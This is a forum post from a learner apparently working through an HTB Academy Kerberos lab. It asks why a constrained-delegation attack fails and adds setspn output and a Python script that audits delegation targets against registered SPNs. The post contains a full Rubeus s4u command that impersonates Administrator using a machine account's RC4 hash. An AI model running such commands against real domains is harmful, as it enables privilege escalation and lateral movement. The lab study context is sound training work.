Hello to all!
I found an error in the KERBEROS ATTACKS module, or maybe I got something wrong. In the Constrained Delegation Overview & Attacking from Windows section (Login To HTB Academy & Continue Learning | HTB Academy) there is a practice question.
I successfully extracted the hash of dmz01$ and was able to check its correctness with Rubeus. But I can't successfully exploit the constrained delegation attack with the command (it is even present in the solutions):
.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:www/WS01.inlanefreight.local /altservice:HTTP /user:DMZ01$ /rc4:81322a06e7a6d0f8764531bc8c52fa66 /ptt
I think this is because there is no such SPN record (www/WS01.inlanefreight.local) on host ws01
Registered ServicePrincipalNames for CN=WS01,CN=Computers,DC=INLANEFREIGHT,DC=LOCAL:
WSMAN/WS01
WSMAN/WS01.INLANEFREIGHT.LOCAL
TERMSRV/WS01
TERMSRV/WS01.INLANEFREIGHT.LOCAL
RestrictedKrbHost/WS01
HOST/WS01
RestrictedKrbHost/WS01.INLANEFREIGHT.LOCAL
HOST/WS01.INLANEFREIGHT.LOCAL
And only this SPN is present in the msds-allowedtodelegateto of dmz01$ (www/WS01.INLANEFREIGHT.LOCAL, www/WS01).
Is it an error in the lab (delegation to a nonexistent SPN), or am I missing something?
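
The comparison made in the post, scripted as an added example (not part of the original post or of the HTB material): it checks each msDS-AllowedToDelegateTo entry against the `setspn -L` output, and also against the HOST alias mapping that Active Directory keeps in its sPNMappings attribute. The function names are hypothetical, `HOST_ALIASES` is an assumed, abbreviated subset of the default sPNMappings value, and only the SPNs of the one account shown are considered.

```python
# Added example: resolve delegation targets against registered SPNs.
# SETSPN_OUTPUT and ALLOWED_TO_DELEGATE_TO are copied from the post above.
SETSPN_OUTPUT = """\
Registered ServicePrincipalNames for CN=WS01,CN=Computers,DC=INLANEFREIGHT,DC=LOCAL:
WSMAN/WS01
WSMAN/WS01.INLANEFREIGHT.LOCAL
TERMSRV/WS01
TERMSRV/WS01.INLANEFREIGHT.LOCAL
RestrictedKrbHost/WS01
HOST/WS01
RestrictedKrbHost/WS01.INLANEFREIGHT.LOCAL
HOST/WS01.INLANEFREIGHT.LOCAL
"""
ALLOWED_TO_DELEGATE_TO = ["www/WS01.INLANEFREIGHT.LOCAL", "www/WS01"]

# Assumption: abbreviated subset of the default sPNMappings "host=" alias list.
# Read the real value from the directory being audited.
HOST_ALIASES = {"www", "http", "cifs", "rpcss", "dns", "spooler", "schedule", "time"}

def parse_setspn(text):
    """Return the SPNs listed by `setspn -L`, lower-cased for comparison."""
    spns = set()
    for line in text.splitlines():
        line = line.strip()
        if not line or line.endswith(":"):  # skip blanks and the header line
            continue
        spns.add(line.lower())
    return spns

def resolve(spn, registered, host_aliases=HOST_ALIASES):
    """Classify one target: 'exact', 'host-alias' or 'unresolved'."""
    spn = spn.lower()
    if spn in registered:
        return "exact"
    service, sep, host = spn.partition("/")
    if sep and service in host_aliases and f"host/{host}" in registered:
        return "host-alias"  # service class is covered by a registered HOST SPN
    return "unresolved"

def audit(targets, setspn_text):
    """Map every delegation target to its resolution status."""
    registered = parse_setspn(setspn_text)
    return {t: resolve(t, registered) for t in targets}

if __name__ == "__main__":
    for target, status in audit(ALLOWED_TO_DELEGATE_TO, SETSPN_OUTPUT).items():
        print(f"{target:35} {status}")
```

An `unresolved` result marks a delegation entry that points at no SPN on the account checked; in a real domain the SPN could still be registered on a different account.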